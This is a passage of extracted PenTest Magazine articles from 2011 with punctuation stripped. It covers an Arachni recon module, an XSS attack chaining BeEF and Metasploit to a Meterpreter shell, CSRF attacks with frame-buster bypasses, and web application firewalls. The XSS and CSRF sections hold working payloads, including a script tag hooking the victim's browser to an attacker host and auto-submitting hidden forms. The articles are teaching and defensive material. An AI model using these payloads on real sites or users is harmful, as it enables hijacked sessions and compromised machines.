path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
